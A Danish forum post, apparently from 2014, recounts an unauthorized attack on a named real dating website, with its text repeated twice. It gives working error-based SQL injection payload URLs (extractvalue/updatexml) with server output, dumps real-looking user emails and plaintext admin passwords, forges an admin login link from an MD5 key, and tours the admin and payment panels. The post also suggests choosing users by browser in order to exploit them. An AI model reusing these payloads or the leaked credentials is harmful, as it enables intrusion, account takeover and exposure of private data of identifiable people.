28-08-2014, 20:16
Så der var en der efterspurgte lidt om Xpath Injection inde I 'Tutorial requests' tråden. Dette er ikke en tutorial som sådan, men mere en lille gennemgang af hvordan Jeg tog mig af denne simple opgave.
EDIT#1 - Blev sku lidt af en lang smøre, selvom jeg havde regnet med at gøre det kort... Mjeh.... Kunne bare ikke stoppe da jeg først var kommet igang. Hvis jeg har lavet fejl må i meget gerne sige til. Skal nok lige kigge det igennem engang.
EDIT#2 - Har omskrevet http til hxxp for ikke at forkorte URL'erne.
EDIT#3 - Kan se tegnene i URL'erne er blevet encoded da jeg kopierede dem. Det skal jeg nok lige få fikset...
Ved ikke hvordan, men af en eller anden åndsvag grund befandt jeg mig på varmsex.dk ;)
Tænkte jeg ville give den et forsøg, da den så temmelig ’råt’ kodet ud.
Før jeg går i sving med at teste en hjemmeside ved manuelt brug af interception proxies(MiTMProxy, Burp, Charles osv.), og den lidt mere automatiserede brug af skannere(Nikto, Acunetix, Vega osv.), er der altid en god portion forarbejde, der kan gøre et muligt angreb betydeligt lettere. En af de aller første skridt er at få en idé om hvor mange forskellige kunder/brugere der har deres domæner til at pege på lige præcis denne host. Der er Uanede sider og services til dette formål, men for mig er det som regel nok at benytte Bing. Så er der ting som Cloudflare osv. Der kan spille ind, men ikke i dette tilfælde.
IP’en på hosten kan vi skaffe ved at pinge domænet:
Denne IP kan vi nu bruge til at finde yderligere domæner der har valgt at hoste deres indhold på samme (shared) server.
Lad os springe over på bing.com, og bruge følgende filter til vores søgning:
Her kan vi også bare nøjes med at taste IP’en ind I Googles søgemaskine, og bruge de forskellige resultater til at få lidt ekstra information. Whois, DNS og alle de andre lookups.
Bing giver os følgende domæner på hosten:
Og hvis vi decideret vil lede efter specifikke filer eller endelser, kan vi bruge følgende (Til hvis fi f. eks leder efter SQLi):
Så langt nåede jeg dog ikke, før jeg opdagede følgende URL cached af Bing:
Hvis vi trykker på linket, er vi pludselig logget ind som den uheldige bruger hvis URL Bing har lagret. Den sidste parameter (key) ligner også til stor forveksling MD5, ikke?
Lad os lige for sjov skyld se hvad HashKillers MD5 Decrypter(Det er jo egentligt en cracker) siger:
Wow.... Så hvis vi får fat i brugernes hashed kodeord, har vi ikke engang brug for at cracke dem.
Nå, men da vi er logget ind og har fuld brugeradgang til siden(VIP), kan vi lige så godt begynde at smide om os med forskellig input.
Vi finder hurtigt ud af, at der faktisk er flere steder hvor vi får SQL fejl hvis vi forsøger at stoppe den igangværende query med ’
Hvis vi fortsætter som enhver anden simpel string-based SQL injection vil vi få følgende fejlmeddelse, og være ude af stand til at udregne antallet af kolonner.
Og hvis vi bruger normal SQL injection får vi følgende fejl:
Hvad gør vi så?
Næste skridt er at tjekke om det muligvis kunne være en Xpath injection.
Forestil jer følgende simple XML fil. Denne fil indeholder en database bestående af brugeroplysninger. XML bruger denne ’træ-struktur’ til at angive opbygningen af ’grene’ i databasen. <Brugere> er vores rod/stamme og herefter består grenene af elementer, attributter osv.
Hvis vi forestiller os at <Brugere> roden er en tabel, og alle grene der hører under den er kolonner, minder det jo meget godt om normal SQL databasestruktur.
Xpath Injection minder også utroligt meget om normal SQL injection. Det er bare et spørgsmål om at kunne huske funktionerne og deres tilhørende parametre.
Med Xpath injection kan vi så bruge disse to funktioner til at manipulere med vores queries:
Updatexml()
eller
Extractvalue()
Problemet med begge funktioner er, at serveren ikke kan svare med mere end 32 tegn.
Vi kan derfor ikke høste ret meget data ad gangen. Hvis vi for eksempel ville forsøge os med både Version(), User(), og Database(), ville vi kun få følgende halvfærdige svar tilbage fra serveren (32 tegn mellem ’ og ’):
Desuden kræver ’concat’ funktionen en hexværdi i starten, da det ellers vil tage en bid af serverens respons. Har her valgt hex-værdien ’7C’, som svarer til ’|’ – alle kan dog bruges. (husk at angive at værdien er i hex-format – dette gøres ved at skrive 0x foran)
Med HEX:
Uden HEX:
Med en begrænsning på 32 tegn, kan vi istedet benytte os af vores gode gamle LIMIT funktion vi kender fra SQL.
Jeg vil benytte mig af ExtractValue() til resten af denne tekst. Det er næsten samme fremgangsmåde som med UpdateXML(), og det ville være rent tidsfordriv at køre begge igennem.
I de næste queries er de eneste ændringer vi har foretaget et komma og en start-parentes efter hex-værdien, samt en slut-parentes i slutningen af vores query. Oven i det skal vi bruge et ’select statement’ som vi kender det fra normal SQL injection/SQL generelt.
Nu da vi har styr på hvordan vores injection virker, er det tid til at finde ud af hvilke databaser vi har adgang til:
Her ses LIMIT I brug. Hvis vi vælger at forøge værdien forsvinder fejlmeddelsen i bunden af siden, og en større del af siden loades end når fejlen er tilstede. Dette betyder at vores query svarer tilbage med et tomt svar, og at der derfor ikke er flere databaser at finde, og vi kan fortsætte med at finde tabeller i en af databaserne.
Det kan vi gøre på samme måde som vi ville gøre det hvis det var normal SQL injection.
Hvis vi skulle oversætte denne query, ville det blive noget I stil med:
Hvis vi i stedet ønsker at kortlægge tabellerne fra en anden database, kan det gøres ved at konvertere databasenavnet til hex, og sætte det ind på database() funktionens plads (Det er ikke ALTID du behøver at konvertere database- og tabel-navne, nogle gange kan du nøjes med at smide dem i enkeltpling som f. eks. ’scormax’ – det er dog et krav i dette eksempel):
Lad os øge vores LIMIT værdi indtil vi støder på en tabel, vi synes der er værd at kigge på. Der er selvfølgelig mange tabeller vi kunne være interesserede i (Pm, messages, mysqllog osv), men hvad vi egentlig er efter, er bruger- eller admin oplysninger:
Nu skal vi have fundet ud af hvilke kolonner der hører til denne tabel. Dette kan gøres ved at ændre vores tidligere query bare en lille smule, så den i stedet for at vælge tabeller, vælger kolonner der hører under en specific tabel.
Igen øger vi vores LIMIT værdi for at få fat I alle de kolonner vi har brug for:
Nu kan vi så gå igang med at trække disse oplysninger ud af databasen. Dette følger også normal SQL injection, så der burde ikke være grund til at gå alt for meget i dybden med det.
Nu kan vi så vælge hvilke kolonner vi vil have fra hvilke tabeller, helt uden brug af hex-værdier eller information_schema:
Her kan vi også tilføje en concat() funktion så vi kan hente flere oplysninger samlet på een gang. Problemet med de begrænsede (32) tegn er her dog stadig, så pas på:
Her har den ændret email fra jimmovsing@hotmail.com til acj@acj-design.dk, og værdien fra admin kolonnen er 1. Vi må gå ud fra dette betyder personen er administrator. For at være sikre øger vi vores LIMIT værdi:
Det ser altså ud til at vi har 2 admins på siden. Lad os se om ikke vi kan skaffe kodeordene, og forhåbentligt logge ind på deres brugere:
Endnu en forøgelse i LIMIT fjerner fejlmeddelsen, og fortæller os igen, at der kun er 2 admins – Og så har de ovenikøbet valgt ikke at hashe brugernes kodeord.....
I de 2 ovenstående queries bruger vi igen lidt SQL magi, så vi kun får email+password fra brugere hvis værdi i admin kolonnen er lig med 1.
Dette kan bruges til at give specifikke omstændigheder for vores resultater.
Hvis vi kigger nogle brugere igennem, kan vi se at der er angivet f. eks. køn og VIP status:
Køn er altså bestemt med m(Mand) og k(Kvinde), og VIP status ser ud til at være dato+klokkeslet – altså enten et timestamp eller en udløbsdato.
Det kan vi bruge til at søge efter brugere af et bestemt køn og VIP status (og vægt, højde, alder osv. – selv browser til hvis vi planlægger at køre et bestemt exploit imod dem – f. eks Internet Explorer):
Her skal bogstaver igen være I hex-format, men tallene kan vi lade være som de er.
Hvad denne query gør, er at tage ’email+password' kolonnerne fra tabellen 'User', hvor ’VIP kolonnens’ værdi er ’MERE end 0’ (vip>0) og ’køns-kolonnen’ er sat til ’kvinde’ (gender=k). Altså hunkøn med VIP status. - Hvad end vi nu kan bruge det til ;)
Nå. Lad os vende tilbage til vores tidligere query, der gav os kodeordene til de to admins på siden:
Her kan vi gå ind I ’kontrolpanelet’ på vores nuværende bruger > Trykke ’LOG UD’ > Trykke på ’LOG IND’ > Indtaste ’email’ og ’kodeord’ > Og til sidst trykke ’Log ind’
ELLER!
Kan i huske det forfærdelige link der gav os adgang til siden i starten af denne tekst?
Vi ved at ’acj brugeren’ er den første i databasen, så vi gå gå ud fra hans ’bruger ID er 1’.
Men lad os nu lige tjekke efter for at være sikker. Samme query som da vi hev email+password ud af databasen, denne gang vil vi bare have fat i ’id’ kolonnen – og for en sikkerhedsskyld tager vi lige email kolonnen med, så vi er sikre på det er den rigtige person vi arbejder med:
Den er sku god nok. Nu kan vi så bruge enten vores egen server, eller en online service til at MD5 hashe hans kodeord. Her bruger vi bare en tilfældig online service til formålet:
http://www.adamek.biz/md5-generator.php
Hvis vi så ændrer vores førnævnte login-link med vores admins ID samt hashed kodoerd vil det se således ud:
![[Billede: ero1.png]](http://anony.ws/i/2014/08/28/ero1.png)
Boom. Nu er vi logget ind som admin, og selvom vi underligt nok ikke har VIP status (LOL), kan vi slette alt i adressen efter http://eromaxi.dk/ - og stadig være logget ind.
Som i kan se har vi et lille admin panel i højre side, og dette panel giver os rettighederne til at:
Sende beskeder fra hans falske profiler(bots):
![[Billede: ero2.png]](http://anony.ws/i/2014/08/28/ero2.png)
Har selvfølgelig ikke sendt beskeden! ;)
Se hans servers cron jobs:
![[Billede: ero3.png]](http://anony.ws/i/2014/08/28/ero3.png)
Se brugernavne og kodeord:
![[Billede: ero4.png]](http://anony.ws/i/2014/08/28/ero4.png)
Og en del andre ting vi kan kigge på. Der er også en del af panelets links der ikke ser ud til at virke, men hvis vi trykker på knappen ’Pay Mananger’ der er placeret under ’Antal brugere ialt’ i toppen af siden på brugersøgningssiden, bliver vi omdirigeret (Og logget ind) på følgende side:
![[Billede: ero5.png]](http://anony.ws/i/2014/08/28/ero5.png)
Her kan vi hvis vi går ind i ’statistik’ se lidt information om gennemførte transaktioner:
2014 – Januar til nu:
![[Billede: ero6.png]](http://anony.ws/i/2014/08/28/ero6.png)
2013 – Hele året:
![[Billede: ero7.png]](http://anony.ws/i/2014/08/28/ero7.png)
Selv med en høj skatteprocent er det sku en fin lille portion ekstra lommepenge.
Hvis han rent faktisk gjorde noget ud af siden, er jeg sikker på han kunne fordoble de tal. Det er jo egentlig ikke ret mange personer der ender op med at betale, og selvom der nok er mange ensomme sataner her i landet, må hans bots have en stor rolle at spille når det kommer til conversions. Hvis han istedet valgte at satse på en ORDENTLIG brugeroplevelse, og opdaterede sit layout samt satsede på flere sociale egenskaber, er jeg sikker på der er uanede mængder penge at tjene på en niche de fleste ellers regner som død.
EDIT#1 - Blev sku lidt af en lang smøre, selvom jeg havde regnet med at gøre det kort... Mjeh.... Kunne bare ikke stoppe da jeg først var kommet igang. Hvis jeg har lavet fejl må i meget gerne sige til. Skal nok lige kigge det igennem engang.
EDIT#2 - Har omskrevet http til hxxp for ikke at forkorte URL'erne.
EDIT#3 - Kan se tegnene i URL'erne er blevet encoded da jeg kopierede dem. Det skal jeg nok lige få fikset...
Ved ikke hvordan, men af en eller anden åndsvag grund befandt jeg mig på varmsex.dk ;)
Tænkte jeg ville give den et forsøg, da den så temmelig ’råt’ kodet ud.
Før jeg går i sving med at teste en hjemmeside ved manuelt brug af interception proxies(MiTMProxy, Burp, Charles osv.), og den lidt mere automatiserede brug af skannere(Nikto, Acunetix, Vega osv.), er der altid en god portion forarbejde, der kan gøre et muligt angreb betydeligt lettere. En af de aller første skridt er at få en idé om hvor mange forskellige kunder/brugere der har deres domæner til at pege på lige præcis denne host. Der er Uanede sider og services til dette formål, men for mig er det som regel nok at benytte Bing. Så er der ting som Cloudflare osv. Der kan spille ind, men ikke i dette tilfælde.
IP’en på hosten kan vi skaffe ved at pinge domænet:
Citer:--- PING eromaxi.dk (94.231.109.86) 56(84) bytes of data. ---
64 bytes from 94.231.109.86: icmp_seq=1 ttl=49 time=41.5 ms
64 bytes from 94.231.109.86: icmp_seq=2 ttl=49 time=41.7 ms
64 bytes from 94.231.109.86: icmp_seq=3 ttl=49 time=41.5 ms
64 bytes from 94.231.109.86: icmp_seq=4 ttl=49 time=41.4 ms
--- eromaxi.dk ping statistics ---
packets transmitted 4
received 4
packet loss 0 %
time 3004 ms
--- Round Trip Time (rtt) ---
min 41.448 ms
avg 41.590 ms
max 41.748 ms
mdev 0.179 ms
Denne IP kan vi nu bruge til at finde yderligere domæner der har valgt at hoste deres indhold på samme (shared) server.
Lad os springe over på bing.com, og bruge følgende filter til vores søgning:
Citer:Ip: 94.231.109.86
Her kan vi også bare nøjes med at taste IP’en ind I Googles søgemaskine, og bruge de forskellige resultater til at få lidt ekstra information. Whois, DNS og alle de andre lookups.
Bing giver os følgende domæner på hosten:
Citer:Escort4.dk
Cdms.dk
Varmsex.dk
Eromaxi.dk
Support.icevision.dk
I4investment.dk
Bannervision.dk
Millionærklubben.dk
Sjusket.dk
Sexnu.dk
Og hvis vi decideret vil lede efter specifikke filer eller endelser, kan vi bruge følgende (Til hvis fi f. eks leder efter SQLi):
Citer:ip:94.231.109.86 ext:phpExtension: PHP
Så langt nåede jeg dog ikke, før jeg opdagede følgende URL cached af Bing:
Citer:hxxp://eromaxi.dk/?subpage=interest&uid=330&key=2b261d225269fe8f9d1bf1aa2d8b9812
Hvis vi trykker på linket, er vi pludselig logget ind som den uheldige bruger hvis URL Bing har lagret. Den sidste parameter (key) ligner også til stor forveksling MD5, ikke?
Lad os lige for sjov skyld se hvad HashKillers MD5 Decrypter(Det er jo egentligt en cracker) siger:
Citer:2b261d225269fe8f9d1bf1aa2d8b9812 MD5 : hagar67
Wow.... Så hvis vi får fat i brugernes hashed kodeord, har vi ikke engang brug for at cracke dem.
Nå, men da vi er logget ind og har fuld brugeradgang til siden(VIP), kan vi lige så godt begynde at smide om os med forskellig input.
Vi finder hurtigt ud af, at der faktisk er flere steder hvor vi får SQL fejl hvis vi forsøger at stoppe den igangværende query med ’
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=21'
Hvis vi fortsætter som enhver anden simpel string-based SQL injection vil vi få følgende fejlmeddelse, og være ude af stand til at udregne antallet af kolonner.
Citer:Fejl You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by 1000 LIMIT 1' at line 1
Line: 6
File: /_pages/group.php
Query: SELECT * FROM `SeoTitles` WHERE `page` = 'index.php' ORDER BY `id` DESC LIMIT 1;
Count: 272
Og hvis vi bruger normal SQL injection får vi følgende fejl:
Citer:Fejl You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1
Line: 6
File: /_pages/group.php
Query: SELECT * FROM `SeoTitles` WHERE `page` = 'index.php' ORDER BY `id` DESC LIMIT 1;
Count: 262
Hvad gør vi så?
Næste skridt er at tjekke om det muligvis kunne være en Xpath injection.
Forestil jer følgende simple XML fil. Denne fil indeholder en database bestående af brugeroplysninger. XML bruger denne ’træ-struktur’ til at angive opbygningen af ’grene’ i databasen. <Brugere> er vores rod/stamme og herefter består grenene af elementer, attributter osv.
Hvis vi forestiller os at <Brugere> roden er en tabel, og alle grene der hører under den er kolonner, minder det jo meget godt om normal SQL databasestruktur.
Kode:
<?xml version="1.0" encoding="UTF-8"?>
<Brugere>
<Bruger ID="1">
<Brugernavn>Kasper74</Brugernavn>
<Kodeord>12345</Kodeord>
<Admin>1</Admin>
</Bruger>
<Bruger ID="2">
<Brugernavn>FrækkeMille</Brugernavn>
<Kodeord> MorsLilleEngel </Kodeord>
<Admin>0</Admin>
</Bruger>
</Brugere>Xpath Injection minder også utroligt meget om normal SQL injection. Det er bare et spørgsmål om at kunne huske funktionerne og deres tilhørende parametre.
Med Xpath injection kan vi så bruge disse to funktioner til at manipulere med vores queries:
Updatexml()
Citer:Term: UPDATEXML
Definition:
The Oracle UPDATEXML function allows you to update XML content stored in Oracle Database. It takes an XMLType instance and an XPath-value pair as arguments and returns an XMLType instance with the updated value.
Example Syntax:
UPDATEXML(XMLType_Instance, XPath_string,
value_expression, namespace_string)
http://psoug.org/definition/UPDATEXML.htm
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=updatexml(1,concat(0x7C,version()),1)
Fejl XPATH syntax error: '|5.5.38-cll-lve'
eller
Extractvalue()
Citer:Term: EXTRACTVALUE
Definition:
The Oracle EXTRACTVALUE function is an XML Type function which is used to select leaf node data value. Note that only lower or sublevel node values can be extracted. It returns value inVARCHAR2 format.
Example Usage:
The SQL query below returns the value existing on XPath '/Orders/MailAddressTo/Company'.
SELECT EXTRACTVALUE(OBJECT_VALUE, '/Orders/MailAddressTo/Company')
AS Company
FROM ORDERS_XML;
COMPANY
--------------
http://psoug.org/definition/EXTRACTVALUE.htm
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,version()))
Fejl XPATH syntax error: '|5.5.38-cll-lve'
Problemet med begge funktioner er, at serveren ikke kan svare med mere end 32 tegn.
Vi kan derfor ikke høste ret meget data ad gangen. Hvis vi for eksempel ville forsøge os med både Version(), User(), og Database(), ville vi kun få følgende halvfærdige svar tilbage fra serveren (32 tegn mellem ’ og ’):
Citer:Fejl XPATH syntax error: '|5.5.38-cll-lve|scormax@localhos'
Citer:http://eromaxi.dk/?subpage=loge&logeid=e...tabase()))
Desuden kræver ’concat’ funktionen en hexværdi i starten, da det ellers vil tage en bid af serverens respons. Har her valgt hex-værdien ’7C’, som svarer til ’|’ – alle kan dog bruges. (husk at angive at værdien er i hex-format – dette gøres ved at skrive 0x foran)
Med HEX:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=updatexml(1,concat(0x7C,user()),1)
Fejl XPATH syntax error: '|scormax@localhost'
Uden HEX:
Citer:http://eromaxi.dk/?subpage=loge&logeid=u...user()),1)
Fejl XPATH syntax error: '@localhost'
Med en begrænsning på 32 tegn, kan vi istedet benytte os af vores gode gamle LIMIT funktion vi kender fra SQL.
Jeg vil benytte mig af ExtractValue() til resten af denne tekst. Det er næsten samme fremgangsmåde som med UpdateXML(), og det ville være rent tidsfordriv at køre begge igennem.
I de næste queries er de eneste ændringer vi har foretaget et komma og en start-parentes efter hex-værdien, samt en slut-parentes i slutningen af vores query. Oven i det skal vi bruge et ’select statement’ som vi kender det fra normal SQL injection/SQL generelt.
Nu da vi har styr på hvordan vores injection virker, er det tid til at finde ud af hvilke databaser vi har adgang til:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select schema_name from information_schema.schemata limit 0,1)))
Fejl XPATH syntax error: '|information_schema'
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select schema_name from information_schema.schemata limit 1,1)))
Fejl XPATH syntax error: '|scormax'
Her ses LIMIT I brug. Hvis vi vælger at forøge værdien forsvinder fejlmeddelsen i bunden af siden, og en større del af siden loades end når fejlen er tilstede. Dette betyder at vores query svarer tilbage med et tomt svar, og at der derfor ikke er flere databaser at finde, og vi kan fortsætte med at finde tabeller i en af databaserne.
Det kan vi gøre på samme måde som vi ville gøre det hvis det var normal SQL injection.
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))
Fejl XPATH syntax error: '|AvoidAnswer'
Hvis vi skulle oversætte denne query, ville det blive noget I stil med:
Citer:Vælg tabel_navn fra information_schema(standart database).tabeller hvor tabel_skema(database)=database()(vores nuværende database).
Hvis vi i stedet ønsker at kortlægge tabellerne fra en anden database, kan det gøres ved at konvertere databasenavnet til hex, og sætte det ind på database() funktionens plads (Det er ikke ALTID du behøver at konvertere database- og tabel-navne, nogle gange kan du nøjes med at smide dem i enkeltpling som f. eks. ’scormax’ – det er dog et krav i dette eksempel):
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select table_name from information_schema.tables where table_schema=0x73636f726d6178 limit 0,1)))(I dette tilfælde er ’s=73-c=63-o=6f-r=72-m=6d-a=61-x=78’ bare den samlede hex-værdi af ’scormax’, da der ikke er andre databaser – så det er ikke andet end en demonstation. Denne side konverterer tekst til hex, og er helt sikkert kendt af mange af jer: http://www.swingnote.com/tools/texttohex.php)
Citer:OBS:
Hvis du er interesseret i at finde ud af hvor mange tabeller der er til stede i databasen UDEN at skulle bruge LIMIT, kan du bruge count() funktionen og sætte den ind i stedet for table_name i vores sidste query:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select Count(*) from information_schema.tables where table_schema=database() limit 0,1)))
Fejl XPATH syntax error: '|72'
72 tabeller.
Den samme function kan også bruges til at tælle databaser, kolonner osv.
Lad os øge vores LIMIT værdi indtil vi støder på en tabel, vi synes der er værd at kigge på. Der er selvfølgelig mange tabeller vi kunne være interesserede i (Pm, messages, mysqllog osv), men hvad vi egentlig er efter, er bruger- eller admin oplysninger:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select table_name from information_schema.tables where table_schema=database() limit 47,1)))
Fejl XPATH syntax error: '|User'
Nu skal vi have fundet ud af hvilke kolonner der hører til denne tabel. Dette kan gøres ved at ændre vores tidligere query bare en lille smule, så den i stedet for at vælge tabeller, vælger kolonner der hører under en specific tabel.
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select column_name from information_schema.columns where table_name=0x55736572 limit 0,1)))
Altså vælger vi kolonner fra ’information_schema.columns’ hvor tabelnavnet er User (U=55-s=73-e=65-r=72)
Fejl XPATH syntax error: '|id'
Igen øger vi vores LIMIT værdi for at få fat I alle de kolonner vi har brug for:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select column_name from information_schema.columns where table_name=0x55736572 limit 1,1)))
Fejl XPATH syntax error: '|username'
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select column_name from information_schema.columns where table_name=0x55736572 limit 4,1)))
Fejl XPATH syntax error: '|email'
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select column_name from information_schema.columns where table_name=0x55736572 limit 6,1)))
Fejl XPATH syntax error: '|password'
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select column_name from information_schema.columns where table_name=0x55736572 limit 8,1)))
Fejl XPATH syntax error: '|vip'
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select column_name from information_schema.columns where table_name=0x55736572 limit 9,1)))
Fejl XPATH syntax error: '|admin'
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select column_name from information_schema.columns where table_name=0x55736572 limit 20,1)))
Fejl XPATH syntax error: '|browser'
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select column_name from information_schema.columns where table_name=0x55736572 limit 23,1)))
Fejl XPATH syntax error: '|gender'
Nu kan vi så gå igang med at trække disse oplysninger ud af databasen. Dette følger også normal SQL injection, så der burde ikke være grund til at gå alt for meget i dybden med det.
Citer:Lad os starte med at finde ud af hvor mange brugere der rent faktisk er i databasen ved hjælp af Count() funktionen fra før:
hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(0x7C,concat(0x7C,(select count(username) from User)))
Fejl XPATH syntax error: '|6537'
Nu kan vi så vælge hvilke kolonner vi vil have fra hvilke tabeller, helt uden brug af hex-værdier eller information_schema:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,(select email from User limit 0,1)))
Fejl XPATH syntax error: '| jimmovsing@hotmail.com'
Her kan vi også tilføje en concat() funktion så vi kan hente flere oplysninger samlet på een gang. Problemet med de begrænsede (32) tegn er her dog stadig, så pas på:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,(select concat(0x7C,email,0x7C,admin) from User limit 0,1)))
Fejl XPATH syntax error: '||acj@acj-design.dk|1'
Her har den ændret email fra jimmovsing@hotmail.com til acj@acj-design.dk, og værdien fra admin kolonnen er 1. Vi må gå ud fra dette betyder personen er administrator. For at være sikre øger vi vores LIMIT værdi:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,(select concat 0x7C,email,0x7C,admin) from User limit 1,1)))
Fejl XPATH syntax error: '||jacobtanis@hotmail.com|1'
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,(select concat(0x7C,email,0x7C,admin) from User limit 2,1)))
Fejl XPATH syntax error: '||Lizettebambi@live.dk|0'
Det ser altså ud til at vi har 2 admins på siden. Lad os se om ikke vi kan skaffe kodeordene, og forhåbentligt logge ind på deres brugere:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,(select concat (0x7C,email,0x7C,password) from User where admin=1 limit 0,1)))
Fejl XPATH syntax error: '||acj@acj-design.dk|82928292Acj'
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,(select concat (0x7C,email,0x7C,password) from User where admin=1 limit 1,1)))
Fejl XPATH syntax error: '||jacobtanis@hotmail.com|10tt10'
Endnu en forøgelse i LIMIT fjerner fejlmeddelsen, og fortæller os igen, at der kun er 2 admins – Og så har de ovenikøbet valgt ikke at hashe brugernes kodeord.....
I de 2 ovenstående queries bruger vi igen lidt SQL magi, så vi kun får email+password fra brugere hvis værdi i admin kolonnen er lig med 1.
Dette kan bruges til at give specifikke omstændigheder for vores resultater.
Hvis vi kigger nogle brugere igennem, kan vi se at der er angivet f. eks. køn og VIP status:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,(select concat(0x7C,gender,0x7C,vip) from User limit 300,1)))
Fejl XPATH syntax error: '||m|0000-00-00 00:00:00'
Køn er altså bestemt med m(Mand) og k(Kvinde), og VIP status ser ud til at være dato+klokkeslet – altså enten et timestamp eller en udløbsdato.
Det kan vi bruge til at søge efter brugere af et bestemt køn og VIP status (og vægt, højde, alder osv. – selv browser til hvis vi planlægger at køre et bestemt exploit imod dem – f. eks Internet Explorer):
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,(select concat 0x7C,email,0x7C,password) from User where vip>0 and gender=0x6b limit 0,1)))
Fejl XPATH syntax error: '||Lizettebambi@live.dk|SMDC16_ap'
Her skal bogstaver igen være I hex-format, men tallene kan vi lade være som de er.
Hvad denne query gør, er at tage ’email+password' kolonnerne fra tabellen 'User', hvor ’VIP kolonnens’ værdi er ’MERE end 0’ (vip>0) og ’køns-kolonnen’ er sat til ’kvinde’ (gender=k). Altså hunkøn med VIP status. - Hvad end vi nu kan bruge det til ;)
Nå. Lad os vende tilbage til vores tidligere query, der gav os kodeordene til de to admins på siden:
Citer:acj@acj-design.dk|82928292Acj
Her kan vi gå ind I ’kontrolpanelet’ på vores nuværende bruger > Trykke ’LOG UD’ > Trykke på ’LOG IND’ > Indtaste ’email’ og ’kodeord’ > Og til sidst trykke ’Log ind’
ELLER!
Kan i huske det forfærdelige link der gav os adgang til siden i starten af denne tekst?
Citer:hxxp://eromaxi.dk/?subpage=interest&uid=330&key=2b261d225269fe8f9d1bf1aa2d8b9812
Vi ved at ’acj brugeren’ er den første i databasen, så vi gå gå ud fra hans ’bruger ID er 1’.
Men lad os nu lige tjekke efter for at være sikker. Samme query som da vi hev email+password ud af databasen, denne gang vil vi bare have fat i ’id’ kolonnen – og for en sikkerhedsskyld tager vi lige email kolonnen med, så vi er sikre på det er den rigtige person vi arbejder med:
Citer:hxxp://eromaxi.dk/?subpage=loge&logeid=extractvalue(1,concat(0x7C,(select concat(0x7C,email,0x7C,id) from User where admin=1 limit 0,1)))
Fejl XPATH syntax error: '||acj@acj-design.dk|1'
Den er sku god nok. Nu kan vi så bruge enten vores egen server, eller en online service til at MD5 hashe hans kodeord. Her bruger vi bare en tilfældig online service til formålet:
http://www.adamek.biz/md5-generator.php
Citer:md5("82928292Acj") = "2dd85310d3e6a60de554204fdf634b70"
Hvis vi så ændrer vores førnævnte login-link med vores admins ID samt hashed kodoerd vil det se således ud:
Citer:hxxp://eromaxi.dk/?subpage=interest&uid=1&key=2dd85310d3e6a60de554204fdf634b70Kan i gætte hvad linket gør?
Boom. Nu er vi logget ind som admin, og selvom vi underligt nok ikke har VIP status (LOL), kan vi slette alt i adressen efter http://eromaxi.dk/ - og stadig være logget ind.
Som i kan se har vi et lille admin panel i højre side, og dette panel giver os rettighederne til at:
Sende beskeder fra hans falske profiler(bots):
Har selvfølgelig ikke sendt beskeden! ;)
Se hans servers cron jobs:
Se brugernavne og kodeord:
Og en del andre ting vi kan kigge på. Der er også en del af panelets links der ikke ser ud til at virke, men hvis vi trykker på knappen ’Pay Mananger’ der er placeret under ’Antal brugere ialt’ i toppen af siden på brugersøgningssiden, bliver vi omdirigeret (Og logget ind) på følgende side:
Citer:https://pay.dandomain.dk/
Her kan vi hvis vi går ind i ’statistik’ se lidt information om gennemførte transaktioner:
2014 – Januar til nu:
2013 – Hele året:
Selv med en høj skatteprocent er det sku en fin lille portion ekstra lommepenge.
Hvis han rent faktisk gjorde noget ud af siden, er jeg sikker på han kunne fordoble de tal. Det er jo egentlig ikke ret mange personer der ender op med at betale, og selvom der nok er mange ensomme sataner her i landet, må hans bots have en stor rolle at spille når det kommer til conversions. Hvis han istedet valgte at satse på en ORDENTLIG brugeroplevelse, og opdaterede sit layout samt satsede på flere sociale egenskaber, er jeg sikker på der er uanede mængder penge at tjene på en niche de fleste ellers regner som død.
![[Billede: 3_11_95_0_0_0_0_0_0.gif]](http://www.fakenamegenerator.com/smiley/3_11_95_0_0_0_0_0_0.gif)